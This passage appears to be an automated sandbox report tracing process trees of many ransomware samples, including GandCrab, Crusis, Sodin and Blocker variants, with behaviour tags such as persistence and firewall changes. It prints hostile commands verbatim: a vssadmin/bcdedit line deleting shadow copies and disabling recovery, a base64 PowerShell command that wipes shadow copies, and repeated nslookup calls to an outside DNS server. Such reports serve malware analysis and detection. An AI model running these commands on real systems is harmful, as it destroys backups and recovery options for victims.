      System Time Discovery
      Modifies registry class
      PID:6340
    - - C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\YB_1EA55.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=6340 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x340,0x344,0x348,0x31c,0x34c,0x4fcbe8,0x4fcbf4,0x4fcc00
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:8204
    - - C:\Windows\TEMP\sdwra_6340_944089207\service_update.exe
        
        "C:\Windows\TEMP\sdwra_6340_944089207\service_update.exe" --setup
        5⤵
        Checks computer location settings
        
        PID:10668
      - C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
        
        "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --install
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:9636
    - - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
        
        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4800
    - - C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
        
        "C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source6340_1062670395\Browser-bin\clids_yandex_second.xml"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5000

C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe
"C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.bzbf-a522c378bbfa4fb5d09bc79f41413ca297823f8253af592187104ca95e664090.exe"
1⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
PID:8532

C:\Windows\SysWOW64\inf\svchost.exe
C:\Windows\SysWOW64\inf\svchost.exe
1⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:8488

C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
"C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:8456
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
  "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: MapViewOfSection
  PID:9244
- - C:\Windows\SysWOW64\svchost.exe
    C:\Windows\syswow64\svchost.exe
    3⤵
    - Adds policy Run key to start application
    - System Location Discovery: System Language Discovery
    PID:9276

C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe
"C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.itys-752faacdb6a477e6b45de1b6e1f2e756dd9a2f3d1a8d6294c11a1c46dd98f611.exe"
1⤵
- Modifies WinLogon for persistence
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- Modifies WinLogon
PID:8412
- C:\Windows\SysWOW64\reg.exe
  reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /f
  2⤵
  - Installs/modifies Browser Helper Object
  - System Location Discovery: System Language Discovery
  PID:10940

C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.iwia-f871ed8e69348e9deb8384dbd6cbc2591826f7a92b88014d2e399ecdb78f91fd.exe
"C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.iwia-f871ed8e69348e9deb8384dbd6cbc2591826f7a92b88014d2e399ecdb78f91fd.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8388
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 8388 -s 224
  2⤵
  - Program crash
  PID:9120

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.jaxq-55417d50410b3fd4d320cde93d52ed939ca46846f764d0bf56228cdb3992d9a0.exe"
1⤵
- Executes dropped EXE
PID:9100
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.jaxq-55417d50410b3fd4d320cde93d52ed939ca46846f764d0bf56228cdb3992d9a0.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Blocker.jaxq-55417d50410b3fd4d320cde93d52ed939ca46846f764d0bf56228cdb3992d9a0.exe
  2⤵
  - Executes dropped EXE
  PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 8388 -ip 8388
1⤵
PID:9164

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:9352
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: RenamesItself
  PID:5844
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:6812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:10180

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe"
1⤵
- Executes dropped EXE
PID:9348
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6032
- - C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
    C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
    3⤵
    PID:4816
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2940
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:10812
  - - C:\Windows\SysWow64\drivers\spools.exe
      "C:\Windows\SysWow64\drivers\spools.exe" "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
      4⤵
      PID:4040
    - - C:\Windows\SysWOW64\mshta.exe
        
        C:\Windows\System32\mshta.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
        5⤵
        
        PID:10104
  - - C:\Windows\SysWow64\drivers\spools.exe
      "C:\Windows\SysWow64\drivers\spools.exe" "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
      4⤵
      PID:2476
    - - C:\Windows\SysWOW64\mshta.exe
        
        C:\Windows\System32\mshta.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
        5⤵
        
        PID:4640

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe"
1⤵
- Executes dropped EXE
PID:9372
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6040
- - C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
    C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
    3⤵
    PID:10152

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9388
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks SCSI registry key(s)
  PID:5960
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 364
    3⤵
    - Program crash
    PID:8364

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.bvu-530779b0c9039c984af2c9f625da1ce89dc59fb4c923cf377781e035d6dac58c.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9424
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.bvu-530779b0c9039c984af2c9f625da1ce89dc59fb4c923cf377781e035d6dac58c.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.bvu-530779b0c9039c984af2c9f625da1ce89dc59fb4c923cf377781e035d6dac58c.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5948
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 468
    3⤵
    - Program crash
    PID:6276

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe"
1⤵
- Executes dropped EXE
PID:7060
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Enumerates connected drives
  - Checks processor information in registry
  PID:5996
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:9032
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup emsisoft.bit dns1.soprodns.ru
    3⤵
    PID:9756
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
    PID:11768
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup emsisoft.bit dns1.soprodns.ru
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:6632
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup emsisoft.bit dns1.soprodns.ru
    3⤵
    PID:10232
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup emsisoft.bit dns1.soprodns.ru
    3⤵
    PID:180
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
    PID:8912
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup emsisoft.bit dns1.soprodns.ru
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns1.soprodns.ru
    3⤵
    PID:11956
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:2472

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6644
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  PID:6008

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe"
1⤵
- Executes dropped EXE
PID:9920
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jfg-3f5aeb2cc7b4e2f71ae77fc3d97243261b8895c7c8db3354f4fc7188285785e6.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookAW
  PID:5932
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 460
    3⤵
    - Program crash
    PID:10632

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jhu-2c442eba1098b401f2209d9c3434abeb472f635bed8e25c44d33a5f12b65c8c6.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10984
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jhu-2c442eba1098b401f2209d9c3434abeb472f635bed8e25c44d33a5f12b65c8c6.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.jhu-2c442eba1098b401f2209d9c3434abeb472f635bed8e25c44d33a5f12b65c8c6.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5928
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 476
    3⤵
    - Program crash
    PID:6472

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.pf-0d777c05c330e188396ca09e7d5fc33707cfa35fd1f4296236290a856863d6ce.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7560
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.pf-0d777c05c330e188396ca09e7d5fc33707cfa35fd1f4296236290a856863d6ce.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GandCrypt.pf-0d777c05c330e188396ca09e7d5fc33707cfa35fd1f4296236290a856863d6ce.exe
  2⤵
  - Executes dropped EXE
  PID:6016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 468
    3⤵
    - Program crash
    PID:4344

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Modifies system executable filetype association
- Adds Run key to start application
- Enumerates connected drives
- Modifies registry class
PID:6196
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
  2⤵
  - Executes dropped EXE
  PID:1036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 5948 -ip 5948
1⤵
PID:10192

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.cys-9609617aa62f273421ff86aadac855bbe646c3cf2d033f9d2d08703a9f12b55b.exe"
1⤵
- Executes dropped EXE
PID:6384
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.cys-9609617aa62f273421ff86aadac855bbe646c3cf2d033f9d2d08703a9f12b55b.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.cys-9609617aa62f273421ff86aadac855bbe646c3cf2d033f9d2d08703a9f12b55b.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:9568
- - C:\Windows\SysWOW64\drivers\spools.exe
    "C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\AppData\Local\Temp\lakii.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Adds Run key to start application
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:9108
  - - C:\Users\Admin\AppData\Local\Temp\lakii.exe
      C:\Users\Admin\AppData\Local\Temp\lakii.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5712
    - - C:\Windows\SysWOW64\drivers\spools.exe
        
        "C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\AppData\Local\Temp\girum.exe"
        5⤵
        
        PID:11952
      - C:\Users\Admin\AppData\Local\Temp\girum.exe
        
        C:\Users\Admin\AppData\Local\Temp\girum.exe
        6⤵
        
        PID:5352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
    3⤵
    PID:9140

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.czx-059fa23ca857d36c68ce1e703580e91cbdea95dca01b807bdd14b316bf75f685.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6324
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.czx-059fa23ca857d36c68ce1e703580e91cbdea95dca01b807bdd14b316bf75f685.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.GenericCryptor.czx-059fa23ca857d36c68ce1e703580e91cbdea95dca01b807bdd14b316bf75f685.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:8624
- - C:\Windows\SysWOW64\drivers\spools.exe
    "C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\AppData\Local\Temp\lakii.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9520
  - - C:\Users\Admin\AppData\Local\Temp\lakii.exe
      C:\Users\Admin\AppData\Local\Temp\lakii.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:7336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
    3⤵
    PID:9612

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6284
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:8540
- - C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
    C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Gen.sgx-dafe53c9fb860e78aae45c8ab3dcc5da6c07ecbac0f62f5f02161a498ab759df.exe
    3⤵
    - Enumerates connected drives
    - Drops file in Program Files directory
    PID:9540
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:12244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5960 -ip 5960
1⤵
PID:8300

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8932
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
  2⤵
  - Adds Run key to start application
  - Drops file in System32 directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:9104
- - C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe
    "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe#$.exe"
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Modifies visiblity of hidden/system files in Explorer
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:9432
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Office\rundll32.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Office\rundll32.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Enumerates connected drives
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:11884

C:\Windows\SysWow64\drivers\spools.exe
"C:\Windows\SysWow64\drivers\spools.exe" "C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8948
- C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
  C:\Users\Admin\Desktop\00371\Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  PID:9164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    3⤵
    PID:7876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
PID:8680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5932 -ip 5932
1⤵
PID:10524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5928 -ip 5928
1⤵
PID:10428

C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --run-as-service
1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3392
- C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
  "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=3392 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x81e784,0x81e790,0x81e79c
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5400
- C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
  "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-scheduler
  2⤵
  - Drops file in Windows directory
  PID:5536
- - C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe
    "C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-background-scheduler
    3⤵
    - Drops file in Windows directory
    PID:5628

C:\Windows\SysWow64\drivers\spools.exe
